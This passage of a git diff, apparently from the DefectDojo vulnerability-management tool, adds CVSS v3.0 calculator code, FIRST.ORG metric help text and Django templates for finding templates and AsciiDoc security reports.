+ xmlOutput = xmlOutput.replace ("__ExploitCodeMaturity__", CVSS.XML_MetricNames["E"][ExploitCodeMaturity || "X"]); + xmlOutput = xmlOutput.replace ("__RemediationLevel__", CVSS.XML_MetricNames["RL"][RemediationLevel || "X"]); + xmlOutput = xmlOutput.replace ("__ReportConfidence__", CVSS.XML_MetricNames["RC"][ReportConfidence || "X"]); + xmlOutput = xmlOutput.replace ("__TemporalScore__", result.temporalMetricScore); + xmlOutput = xmlOutput.replace ("__TemporalSeverityRating__", result.temporalSeverity); + + xmlOutput = xmlOutput.replace ("__ConfidentialityRequirement__", CVSS.XML_MetricNames["CIAR"][ConfidentialityRequirement || "X"]); + xmlOutput = xmlOutput.replace ("__IntegrityRequirement__", CVSS.XML_MetricNames["CIAR"][IntegrityRequirement || "X"]); + xmlOutput = xmlOutput.replace ("__AvailabilityRequirement__", CVSS.XML_MetricNames["CIAR"][AvailabilityRequirement || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedAttackVector__", CVSS.XML_MetricNames["MAV"][ModifiedAttackVector || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedAttackComplexity__", CVSS.XML_MetricNames["MAC"][ModifiedAttackComplexity || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedPrivilegesRequired__", CVSS.XML_MetricNames["MPR"][ModifiedPrivilegesRequired || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedUserInteraction__", CVSS.XML_MetricNames["MUI"][ModifiedUserInteraction || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedScope__", CVSS.XML_MetricNames["MS"][ModifiedScope || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedConfidentiality__", CVSS.XML_MetricNames["MCIA"][ModifiedConfidentiality || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedIntegrity__", CVSS.XML_MetricNames["MCIA"][ModifiedIntegrity || "X"]); + xmlOutput = xmlOutput.replace ("__ModifiedAvailability__", CVSS.XML_MetricNames["MCIA"][ModifiedAvailability || "X"]); + xmlOutput = xmlOutput.replace ("__EnvironmentalScore__", result.environmentalMetricScore); + xmlOutput = xmlOutput.replace ("__EnvironmentalSeverityRating__", result.environmentalSeverity); + + return { success: true, xmlString: xmlOutput }; +}; + + + +/* ** CVSS.generateXMLFromVector ** + * + * Takes Base, Temporal and Environmental metric values as a single string in the Vector String format defined + * in the CVSS v3.0 standard definition of the Vector String. + * + * Returns an XML string representation of this input. See the comment for CVSS.generateXMLFromMetrics for more + * detail on inputs, return values and errors. In addition to the error conditions listed for that function, this + * function can also return: + * "MalformedVectorString", if the Vector String passed is does not conform to the format in the standard; or + * "MultipleDefinitionsOfMetric", if the Vector String is well formed but defines the same metric (or metrics), + * more than once. + +CVSS.generateXMLFromVector = function ( vectorString ) { + + var metricValues = { + AV: undefined, AC: undefined, PR: undefined, UI: undefined, S: undefined, + C: undefined, I: undefined, A: undefined, + E: undefined, RL: undefined, RC: undefined, + CR: undefined, IR: undefined, AR: undefined, + MAV: undefined, MAC: undefined, MPR: undefined, MUI: undefined, MS: undefined, + MC: undefined, MI: undefined, MA: undefined + }; + + // If input validation fails, this array is populated with strings indicating which metrics failed validation. + var badMetrics = []; + + if (!CVSS.vectorStringRegex_30.test(vectorString)) { + return { success: false, errorType: "MalformedVectorString" }; + } + + var metricNameValue = vectorString.substring(CVSS.CVSSVersionIdentifier.length).split("/"); + + for (var i in metricNameValue) { + if (metricNameValue.hasOwnProperty(i)) { + + var singleMetric = metricNameValue[i].split(":"); + + if (typeof metricValues[singleMetric[0]] === "undefined") { + metricValues[singleMetric[0]] = singleMetric[1]; + } else { + badMetrics.push(singleMetric[0]); + } + } + } + + if (badMetrics.length > 0) { + return { success: false, errorType: "MultipleDefinitionsOfMetric", errorMetrics: badMetrics }; + } + + return CVSS.generateXMLFromMetrics ( + metricValues.AV, metricValues.AC, metricValues.PR, metricValues.UI, metricValues.S, + metricValues.C, metricValues.I, metricValues.A, + metricValues.E, metricValues.RL, metricValues.RC, + metricValues.CR, metricValues.IR, metricValues.AR, + metricValues.MAV, metricValues.MAC, metricValues.MPR, metricValues.MUI, metricValues.MS, + metricValues.MC, metricValues.MI, metricValues.MA); +}; +*/ \ No newline at end of file diff --git a/dojo/static/dojo/js/cvsscalc30_helptext.js b/dojo/static/dojo/js/cvsscalc30_helptext.js new file mode 100644 index 00000000000..9fcef5b0af3 --- /dev/null +++ b/dojo/static/dojo/js/cvsscalc30_helptext.js @@ -0,0 +1,156 @@ +/* Copyright (c) 2015, FIRST.ORG, INC. + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the + * following conditions are met: + * 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following + * disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the + * following disclaimer in the documentation and/or other materials provided with the distribution. + * 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote + * products derived from this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, + * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, + * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +var CVSS_Help = {}; + +// This object is used as an associative array mapping the names of elements on the web page to help text that is +// added as title text. Browsers will display the text when the element is hovered over with the cursor. +CVSS_Help.helpText_en = { + "baseMetricGroup_Legend" : "The Base Metric group represents the intrinsic characteristics of a vulnerability that are constant over time and across user environments. Determine the vulnerable component and score Attack Vector, Attack Complexity, Privileges Required and User Interaction relative to this.", + + "AV_Heading" : "This metric reflects the context by which vulnerability exploitation is possible. The Base Score increases the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable component.", + "AV_N_Label" : "A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed \"remotely exploitable\” and can be thought of as an attack being exploitable one or more network hops away.", + "AV_A_Label" : "A vulnerability exploitable with adjacent network access means the vulnerable component is bound to the network stack, however the attack is limited to the same shared physical (e.g. Bluetooth, IEEE 802.11), or logical (e.g. local IP subnet) network, and cannot be performed across an OSI layer 3 boundary (e.g. a router).", + "AV_L_Label" : "A vulnerability exploitable with local access means that the vulnerable component is not bound to the network stack, and the attacker’s path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.", + "AV_P_Label" : "A vulnerability exploitable with physical access requires the attacker to physically touch or manipulate the vulnerable component. Physical interaction may be brief or persistent.", + + "AC_Heading" : "This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Such conditions may require the collection of more information about the target, the presence of certain system configuration settings, or computational exceptions.", + "AC_L_Label" : "Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.", + "AC_H_Label" : "A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. For example, a successful attack may require the attacker: to perform target-specific reconnaissance; to prepare the target environment to improve exploit reliability; or to inject herself into the logical network path between the target and the resource requested by the victim in order to read and/or modify network communications (e.g. a man in the middle attack).", + + "PR_Heading" : "This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. This Base Score increases as fewer privileges are required.", + "PR_N_Label" : "The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.", + "PR_L_Label" : "The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources.", + "PR_H_Label" : "The attacker is authorized with (i.e. requires) privileges that provide significant (e.g. administrative) control over the vulnerable component that could affect component-wide settings and files.", + + "UI_Heading" : "This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise the vulnerable component. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner. The Base Score is highest when no user interaction is required.", + "UI_N_Label" : "The vulnerable system can be exploited without any interaction from any user.", + "UI_R_Label" : "Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited.", + + "S_Heading" : "Does a successful attack impact a component other than the vulnerable component? If so, the Base Score increases and the Confidentiality, Integrity and Authentication metrics should be scored relative to the impacted component.", + "S_U_Label" : "An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.", + "S_C_Label" : "An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different.", + + "C_Heading" : "This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.", + "C_N_Label" : "There is no loss of confidentiality within the impacted component.", + "C_L_Label" : "There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is constrained. The information disclosure does not cause a direct, serious loss to the impacted component.", + "C_H_Label" : "There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact.", + + "I_Heading" : "This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.", + "I_N_Label" : "There is no loss of integrity within the impacted component.", + "I_L_Label" : "Modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is constrained. The data modification does not have a direct, serious impact on the impacted component.", + "I_H_Label" : "There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.", + + "A_Heading" : "This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. It refers to the loss of availability of the impacted component itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of an impacted component.", + "A_N_Label" : "There is no impact to availability within the impacted component.", + "A_L_Label" : "There is reduced performance or interruptions in resource availability. Even if repeated exploitation of the vulnerability is possible, the attacker does not have the ability to completely deny service to legitimate users. The resources in the impacted component are either partially available all of the time, or fully available only some of the time, but overall there is no direct, serious consequence to the impacted component.", + "A_H_Label" : "There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).", + + "temporalMetricGroup_Legend" : "The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.", + + "E_Heading" : "This metric measures the likelihood of the vulnerability being attacked, and is typically based on the current state of exploit techniques, exploit code availability, or active, 'in-the-wild' exploitation.", + "E_X_Label" : "Assigning this value to the metric will not influence the score.", + "E_U_Label" : "No exploit code is available, or an exploit is theoretical.", + "E_P_Label" : "Proof-of-concept exploit code is available, or an attack demonstration is not practical for most systems. The code or technique is not functional in all situations and may require substantial modification by a skilled attacker.", + "E_F_Label" : "Functional exploit code is available. The code works in most situations where the vulnerability exists.", + "E_H_Label" : "Functional autonomous code exists, or no exploit is required (manual trigger) and details are widely available. Exploit code works in every situation, or is actively being delivered via an autonomous agent (such as a worm or virus). Network-connected systems are likely to encounter scanning or exploitation attempts. Exploit development has reached the level of reliable, widely-available, easy-to-use automated tools.", + + "RL_Heading" : "The Remediation Level of a vulnerability is an important factor for prioritization. The typical vulnerability is unpatched when initially published. Workarounds or hotfixes may offer interim remediation until an official patch or upgrade is issued. Each of these respective stages adjusts the temporal score downwards, reflecting the decreasing urgency as remediation becomes final.", + "RL_X_Label" : "Assigning this value to the metric will not influence the score.", + "RL_O_Label" : "A complete vendor solution is available. Either the vendor has issued an official patch, or an upgrade is available.", + "RL_T_Label" : "There is an official but temporary fix available. This includes instances where the vendor issues a temporary hotfix, tool, or workaround.", + "RL_W_Label" : "There is an unofficial, non-vendor solution available. In some cases, users of the affected technology will create a patch of their own or provide steps to work around or otherwise mitigate the vulnerability.", + "RL_U_Label" : "There is either no solution available or it is impossible to apply.", + + "RC_Heading" : "This metric measures the degree of confidence in the existence of the vulnerability and the credibility of the known technical details. Sometimes only the existence of vulnerabilities are publicized, but without specific details. For example, an impact may be recognized as undesirable, but the root cause may not be known. The vulnerability may later be corroborated by research which suggests where the vulnerability may lie, though the research may not be certain. Finally, a vulnerability may be confirmed through acknowledgement by the author or vendor of the affected technology. The urgency of a vulnerability is higher when a vulnerability is known to exist with certainty. This metric also suggests the level of technical knowledge available to would-be attackers.", + "RC_X_Label" : "Assigning this value to the metric will not influence the score.", + "RC_U_Label" : "There are reports of impacts that indicate a vulnerability is present. The reports indicate that the cause of the vulnerability is unknown, or reports may differ on the cause or impacts of the vulnerability. Reporters are uncertain of the true nature of the vulnerability, and there is little confidence in the validity of the reports or whether a static Base score can be applied given the differences described. An example is a bug report which notes that an intermittent but non-reproducible crash occurs, with evidence of memory corruption suggesting that denial of service, or possible more serious impacts, may result.", + "RC_R_Label" : "Significant details are published, but researchers either do not have full confidence in the root cause, or do not have access to source code to fully confirm all of the interactions that may lead to the result. Reasonable confidence exists, however, that the bug is reproducible and at least one impact is able to be verified (Proof-of-concept exploits may provide this). An example is a detailed write-up of research into a vulnerability with an explanation (possibly obfuscated or 'left as an exercise to the reader') that gives assurances on how to reproduce the results.", + "RC_C_Label" : "Detailed reports exist, or functional reproduction is possible (functional exploits may provide this). Source code is available to independently verify the assertions of the research, or the author or vendor of the affected code has confirmed the presence of the vulnerability.", + + "environmentalMetricGroup_Legend" : "These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of complementary/alternative security controls in place, Confidentiality, Integrity, and Availability. The metrics are the modified equivalent of base metrics and are assigned metric values based on the component placement in organization infrastructure.", + + "CR_Heading" : "These metrics enable the analyst to customize the CVSS score depending on the importance of the Confidentiality of the affected IT asset to a user’s organization, relative to other impacts. This metric modifies the environmental score by reweighting the Modified Confidentiality impact metric versus the other modified impacts.", + "CR_X_Label" : "Assigning this value to the metric will not influence the score.", + "CR_L_Label" : "Loss of Confidentiality is likely to have only a limited adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).", + "CR_M_Label" : "Assigning this value to the metric will not influence the score.", + "CR_H_Label" : "Loss of Confidentiality is likely to have a catastrophic adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).", + + "IR_Heading" : "These metrics enable the analyst to customize the CVSS score depending on the importance of the Integrity of the affected IT asset to a user’s organization, relative to other impacts. This metric modifies the environmental score by reweighting the Modified Integrity impact metric versus the other modified impacts.", + "IR_X_Label" : "Assigning this value to the metric will not influence the score.", + "IR_L_Label" : "Loss of Integrity is likely to have only a limited adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).", + "IR_M_Label" : "Assigning this value to the metric will not influence the score.", + "IR_H_Label" : "Loss of Integrity is likely to have a catastrophic adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).", + + "AR_Heading" : "These metrics enable the analyst to customize the CVSS score depending on the importance of the Availability of the affected IT asset to a user’s organization, relative to other impacts. This metric modifies the environmental score by reweighting the Modified Availability impact metric versus the other modified impacts.", + "AR_X_Label" : "Assigning this value to the metric will not influence the score.", + "AR_L_Label" : "Loss of Availability is likely to have only a limited adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).", + "AR_M_Label" : "Assigning this value to the metric will not influence the score.", + "AR_H_Label" : "Loss of Availability is likely to have a catastrophic adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).", + + // All the following text should be copied exactly from the Base Score metrics (above), except that + // "Not Defined (X)" values need to be added. + "MAV_Heading" : "This metric reflects the context by which vulnerability exploitation is possible. The Base Score increases the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable component.", + "MAV_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MAV_N_Label" : "A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed \"remotely exploitable\” and can be thought of as an attack being exploitable one or more network hops away.", + "MAV_A_Label" : "A vulnerability exploitable with adjacent network access means the vulnerable component is bound to the network stack, however the attack is limited to the same shared physical (e.g. Bluetooth, IEEE 802.11), or logical (e.g. local IP subnet) network, and cannot be performed across an OSI layer 3 boundary (e.g. a router).", + "MAV_L_Label" : "A vulnerability exploitable with local access means that the vulnerable component is not bound to the network stack, and the attacker’s path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.", + "MAV_P_Label" : "A vulnerability exploitable with physical access requires the attacker to physically touch or manipulate the vulnerable component. Physical interaction may be brief or persistent.", + + "MAC_Heading" : "This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Such conditions may require the collection of more information about the target, the presence of certain system configuration settings, or computational exceptions.", + "MAC_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MAC_L_Label" : "Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.", + "MAC_H_Label" : "A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. For example, a successful attack may require the attacker: to perform target-specific reconnaissance; to prepare the target environment to improve exploit reliability; or to inject herself into the logical network path between the target and the resource requested by the victim in order to read and/or modify network communications (e.g. a man in the middle attack).", + + "MPR_Heading" : "This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. This Base Score increases as fewer privileges are required.", + "MPR_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MPR_N_Label" : "The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.", + "MPR_L_Label" : "The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources.", + "MPR_H_Label" : "The attacker is authorized with (i.e. requires) privileges that provide significant (e.g. administrative) control over the vulnerable component that could affect component-wide settings and files.", + + "MUI_Heading" : "This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise the vulnerable component. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner. The Base Score is highest when no user interaction is required.", + "MUI_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MUI_N_Label" : "The vulnerable system can be exploited without any interaction from any user.", + "MUI_R_Label" : "Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited.", + + "MS_Heading" : "Does a successful attack impact a component other than the vulnerable component? If so, the Base Score increases and the Confidentiality, Integrity and Authentication metrics should be scored relative to the impacted component.", + "MS_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MS_U_Label" : "An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.", + "MS_C_Label" : "An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different.", + + "MC_Heading" : "This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.", + "MC_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MC_N_Label" : "There is no loss of confidentiality within the impacted component.", + "MC_L_Label" : "There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is constrained. The information disclosure does not cause a direct, serious loss to the impacted component.", + "MC_H_Label" : "There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact.", + + "MI_Heading" : "This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.", + "MI_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MI_N_Label" : "There is no loss of integrity within the impacted component.", + "MI_L_Label" : "Modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is constrained. The data modification does not have a direct, serious impact on the impacted component.", + "MI_H_Label" : "There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.", + + "MA_Heading" : "This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. It refers to the loss of availability of the impacted component itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of an impacted component.", + "MA_X_Label" : "Use the value assigned to the corresponding Base Score metric.", + "MA_N_Label" : "There is no impact to availability within the impacted component.", + "MA_L_Label" : "There is reduced performance or interruptions in resource availability. Even if repeated exploitation of the vulnerability is possible, the attacker does not have the ability to completely deny service to legitimate users. The resources in the impacted component are either partially available all of the time, or fully available only some of the time, but overall there is no direct, serious consequence to the impacted component.", + "MA_H_Label" : "There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable)." +}; diff --git a/dojo/templates/dojo/add_template.html b/dojo/templates/dojo/add_template.html index 3953559891b..541d2999f10 100644 --- a/dojo/templates/dojo/add_template.html +++ b/dojo/templates/dojo/add_template.html @@ -22,6 +22,11 @@

    {{ name }} {{ template }}

    {% csrf_token %} {% include "dojo/form_fields.html" with form=form %}
    + {% if count > 0 %} +
    +

    {{ count }} active, verified finding{{ count|pluralize }} match this template.

    +
    + {% endif %}
    diff --git a/dojo/templates/dojo/asciidoc_report.html b/dojo/templates/dojo/asciidoc_report.html new file mode 100644 index 00000000000..0327ad9f731 --- /dev/null +++ b/dojo/templates/dojo/asciidoc_report.html @@ -0,0 +1,654 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} + {% load event_tags %} + {% load display_tags %} + {% load humanize %} + {% load get_endpoint_status %} + {% load get_note_status %} + {% load get_notetype_availability %} + + + + {% if product_type %} +

    = {{ product_type }} =

    + {% elif product %} +

    = {{ product }} {% if endpoints %} - Endpoints {% endif %}=

    + {% elif engagement %} +

    = {{ engagement.product.name }}: {{ engagement }} =

    + {% elif test %} +

    = {{ test.engagement.product.name }}: {{ test.engagement }}, {{ test }} =

    + {% elif endpoint %} +

    = Endpoint Report =

    + {% if host_view %} +

    = {{ endpoint.host }} =

    + {% else %} +

    = {{ endpoint }} =

    + {% endif %} + {% endif %} + Generated By {{ user.get_full_name }} <{{ request.user.email }}>
    + Generated On {% now "SHORT_DATE_FORMAT" %}
    + {% if include_table_of_contents%} +
    +
    +

    Table of Contents for {{ product.name }}

    +
    +
    + +
    + {% endif %} + {% if include_executive_summary and not endpoint %} +
    +

    == Executive Summary ==

    +

    + {% if product_type %} + {% for prod in product_type.prod_type.all %} +

    === {{ prod.name }} ===


    + + {% if prod.engagement_set.all %} + {% for eng in prod.engagement_set.all %} + {% if eng.name and eng.name|length > 0 %} + The {{ eng.name }} + {% else %} + An + {% endif %} + engagement ran from {{ eng.target_start|date:"SHORT_DATE_FORMAT" }} + {% if eng.target_end %} + to {{ eng.target_end|date:"SHORT_DATE_FORMAT" }}. + {% else %} + and is ongoing. + {% endif %} + {% if eng.test_set %} +

    The engagement also included the following tests which may be reported here:
    +
    + {% for t in eng.test_set.all %} + * {{ t }} + ({{ t.environment.name|default:"unknown" }}): + {{ t.target_start|date:"SHORT_DATE_FORMAT" }}
    + {% endfor %} + {% endif %} + {% if eng.test_strategy %} +
    The test strategy for this engagement can be viewed at + {{ eng.test_strategy }}

    + {% else %} +
    + {% endif %} + {% endfor %} + {% else %} + No engagements found for {{ prod.name }}

    + {% endif %} + {% endfor %} + A total of {{ findings|length|apnumber }} finding{{ findings|length|pluralize }} of varying severity are + represented in this report. + {% endif %} + {% if product %} + {% if product.engagement_set.all %} + {% for eng in product.engagement_set.all %} +
    + {% if eng.name and eng.name|length > 0 %} + The {{ eng.name }} + {% else %} + An + {% endif %} + engagement ran from {{ eng.target_start|date:"SHORT_DATE_FORMAT" }} + {% if eng.target_end %} + to {{ eng.target_end|date:"SHORT_DATE_FORMAT" }}. + {% else %} + and is ongoing. + {% endif %} + {% if eng.test_set %} +

    The engagement also included the following tests which may be reported here:

    + {% for t in eng.test_set.all %} + * {{ t }} + ({{ t.environment.name|default:"unknown" }}): {{ t.target_start|date:"SHORT_DATE_FORMAT" }} +
    + {% endfor %} + {% endif %} + {% if eng.test_strategy %} +
    The test strategy for this engagement can be viewed at + {{ eng.test_strategy }}

    + {% else %} +
    + {% endif %} + {% endfor %} + {% else %} + No engagements found for {{ product.name }}

    + {% endif %} + A total of {{ findings|length|apnumber }} finding{{ findings|length|pluralize }} of varying severity are + represented in this report. + {% endif %} + {% if engagement %} +
    + {% if engagement.name and engagement.name|length > 0 %} + The {{ engagement.name }} + {% else %} + An + {% endif %} + engagement ran from {{ engagement.target_start|date:"SHORT_DATE_FORMAT" }} + {% if engagement.target_end %} + to {{ engagement.target_end|date:"SHORT_DATE_FORMAT" }}. + {% else %} + and is ongoing. + {% endif %} + {% if engagement.test_set %} +

    The engagement also included the following tests which may be reported here:

    + {% for t in engagement.test_set.all %} + * {{ t }} + ({{ t.environment.name|default:"unknown" }}): {{ t.target_start|date:"SHORT_DATE_FORMAT" }}
    + {% endfor %} + {% endif %} + {% if engagement.test_strategy %} +
    The test strategy for this engagement can be viewed at + {{ engagement.test_strategy }}

    + {% else %} +
    + {% endif %} + A total of {{ findings|length|apnumber }} finding{{ findings|length|pluralize }} of varying severity are + represented in this report. + {% endif %} + {% if test %} +
    + A {{ test }} was conducted in the {{ test.environment.name }} environment + {% if test.target_end %} + from {{ test.target_start|date:"SHORT_DATE_FORMAT" }} to {{ test.target_end|date:"SHORT_DATE_FORMAT" }} + {% else %} + on {{ test.target_start|date:"SHORT_DATE_FORMAT" }} + {% endif %} + which yielded a total of {{ findings|length|apnumber }} finding{{ findings|length|pluralize }} of varying + severity.

    + The test was part of + {% if test.engagement.name %} + the {{ test.engagement.name }} + {% else %} + an + {% endif %} + engagement which ran from {{ test.engagement.target_start|date:"SHORT_DATE_FORMAT" }} + {% if test.engagement.target_end %} + to {{ test.engagement.target_end|date:"SHORT_DATE_FORMAT" }}. + {% else %} + and is ongoing. + {% endif %} +

    + {% if test.engagement.test_set %} + The engagement also included the following tests which are not reported here:

    + {% for t in test.engagement.test_set.all %} + {% if test.id != t.id %} + * {{ t }} + ({{ t.environment.name|default:"unknown" }}): {{ t.target_start|date:"SHORT_DATE_FORMAT" }}
    + {% endif %} + {% endfor %} + + {% endif %} + {% endif %} +

    + {% endif %} + {% if include_disclaimer%} +

    == Disclaimer ==

    +
    {{ disclaimer }}
    + {% endif %} +
    + {% if test %} + {% with notes=test.notes.all|get_public_notes %} +

    == Test Notes ==

    +

    + {% if notes %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note }} +
    + {% endfor %} + {% endif %} +

    +
    + {% endwith %} + {% endif %} + + {% if engagement.test_set.all %} +

    == Test Notes ==

    +

    + {% for test in engagement.test_set.all %} + {% with notes=test.notes.all|get_public_notes %} + {% if notes %} + {% for note in notes reversed %} + {{ note.author }} - {{ note.date }} - {{ note }} +
    + {% endfor %} + {% endif %} + {% endwith %} + {% endfor %} +

    +
    + {% endif %} + + {% if engagement.risk_acceptance.count %} +

    == ?Risk Accepted Findings ==

    + |===
    + |Name |Date |Severity
    + {% for risk in engagement.risk_acceptance.all %} + {% for finding in risk.accepted_findings.all %} + |{{ finding.title }}
    + |{{ finding.date }}
    + |{{ finding.severity }}
    + {% endfor %} + {% endfor %} + |===
    +
    + {% endif %} + + {% if findings %} +

    == Findings ==

    +
    + {% endif %} + + {% for find in findings %} +

    ==== Finding {{ find.id }}: {{ find.title | nice_title }} {% if find.mitigated %} + Mitigated on: {{ find.mitigated }} {% endif %} + {% if find.tags %} + + [ + {% for tag in find.tags.all %} + {{ tag }} + {% endfor %} + ] + + {% endif %} ==== +

    +
    +

    ==== Product: ==== +
    + {{ find.test.engagement.product.name }} +

    +
    +

    ==== Status: ==== +
    + {{ find.status }} +

    +
    +

    ==== CVSS v3: ==== +
    + {{ find.cvssv3 }} +

    +
    +

    ==== Severity: ==== +
    + +{{ find.severity }} ({{ find.numerical_severity }}) + +

    +

    ==== Description / Exploit: ==== +
